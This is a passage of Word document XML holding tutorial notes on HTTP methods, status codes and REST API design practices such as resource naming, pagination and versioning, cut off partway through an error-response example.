            <w:r w:rsidRPr="0037017A">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C0A88C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Read/retrieve resource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0EBF2E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Yes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C91AA5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Yes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101FD2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Fetch data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="76A1638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7BEBDA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">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13ABE9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Create new resource / trigger action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B6FFCE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>No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806CE9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>No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DEEFC7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Create, complex operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="3CFE686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753C9E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>PUT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A340F5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Replace entire resource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FFBC62" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Yes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EB0372" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>No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F01264" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Full update</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="489EA11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F85512" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>PATCH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E44D9B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Partial update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822ABE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>No*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AEA98B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>No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AB1057" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Partial update</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="7C7D488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96ADC6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:lastRenderedPageBreak/>
              <w:t>DELETE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95442C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Remove resource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650B26" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Yes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698F5D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>No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ADC577" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Delete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="178CE30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549598" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>HEAD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FBE2BA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Like GET but no body (metadata only)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35D2D0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Yes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E535DA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Yes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4FC031" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Check existence, headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="7651832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EE6B79" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>OPTIONS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9DB1F5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Describe available operations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C0FC44" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Yes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9A84A2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Yes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DF2313" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>CORS preflight, API discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3020E3DB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D2120F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Idempotent: Multiple identical requests = same effect as single request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0BD0EC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  PUT /users/42 {name: "Alice"} — doing it 10 times still results in name="Alice".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165AB0CC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  POST /orders {item: "widget"} — doing it 10 times creates 10 orders!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303D4B64" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="3A820788" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Safe: Does not modify server state (read-only).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2967BBD5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  GET, HEAD, OPTIONS are safe (never change data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9DA28A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.3 HTTP Status Codes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3971388A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4792C6A5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>2xx Success:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DB90D7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  200 OK           — Request succeeded (general success).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56506D55" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  201 Created      — Resource created (POST response, includes Location header).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667F3EED" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  204 No Content   — Success, but no body to return (DELETE, PUT).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9DFD43" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  202 Accepted     — Request accepted for async processing (not yet completed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A09D425" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="461C835B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>3xx Redirection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE813D2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  301 Moved Permanently — Resource moved, update your bookmarks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384D505B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  304 Not Modified      — Conditional GET: resource hasn't changed (use cached version).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09109093" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="5B86FEE3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t>4xx Client Errors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ED401A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  400 Bad Request        — Invalid input/syntax.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC10606" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  401 Unauthorized       — Not authenticated (need to log in).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1411198E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  403 Forbidden          — Authenticated but not authorized (don't have permission).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0E1C59" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  404 Not Found          — Resource doesn't exist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B627247" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  405 Method Not Allowed — This resource doesn't support that HTTP method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC6CFA7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  409 Conflict           — Conflict with current state (e.g., version mismatch).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18192CE9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  422 Unprocessable Entity — Valid syntax but semantic errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DCA80F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  429 Too Many Requests  — Rate limited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642810E1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="701C61E0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>5xx Server Errors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE3BBEC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  500 Internal Server Error — Unhandled server-side error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAD15CA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  502 Bad Gateway           — Upstream service returned an invalid response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D29C40C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  503 Service Unavailable   — Temporarily overloaded/down (retry later).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6652B5C8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  504 Gateway Timeout       — Upstream service didn't respond in time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E14A70E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.4 REST API Design — Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49597F0E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resource naming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096C140E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124A1A01" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>GOOD (nouns, plural, hierarchical):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD465B1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  GET  /users              — List users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524DFC29" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  GET  /users/42           — Get user 42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF87F7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  POST /users              — Create user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789FC4C0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  GET  /users/42/orders    — List orders for user 42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244BF888" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  GET  /users/42/orders/7  — Get order 7 of user 42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118A39C6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="7ED71587" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>BAD (verbs, inconsistent):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C61C984" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  GET /getUser?id=42       — Verb in URL (anti-pattern)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7C8EF6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  POST /createOrder        — Verb in URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B85748B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  GET /user/42             — Singular (inconsistent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D4D809" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  GET /users/42/getOrders  — Verb in URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45707516" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Filtering, pagination, sorting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0648A017" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3256B1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>GET /products?category=electronics&amp;min_price=100&amp;max_price=500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453490F4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>GET /products?sort=-created_at&amp;page=3&amp;per_page=20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA9B384" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>GET /orders?status=pending&amp;created_after=2024-01-01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65587E61" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="0EF54E9F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Pagination styles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D5D524" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Offset: ?page=3&amp;per_page=20 (simple but slow for deep pages)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5ECCCC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Cursor: ?cursor=eyJpZCI6MTAwfQ&amp;limit=20 (scalable, opaque cursor)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E39EB9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Keyset: ?after_id=100&amp;limit=20 (efficient, transparent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4D1FB5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Versioning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC6504C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F036306" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>URL path (most common):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFAE133" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  /api/v1/users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069E63D5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  /api/v2/users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05689110" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="1791CC83" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Header-based:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5F6BD2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Accept: application/vnd.myapi.v2+json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB833E7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="27ABEBE0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Query parameter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0984CABE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  /users?version=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466290BF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Error responses (consistent structure):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E57D24B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t>JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2B5819" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDF6A30" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  "error": {</w:t>
      </w:r>
    </w:p>
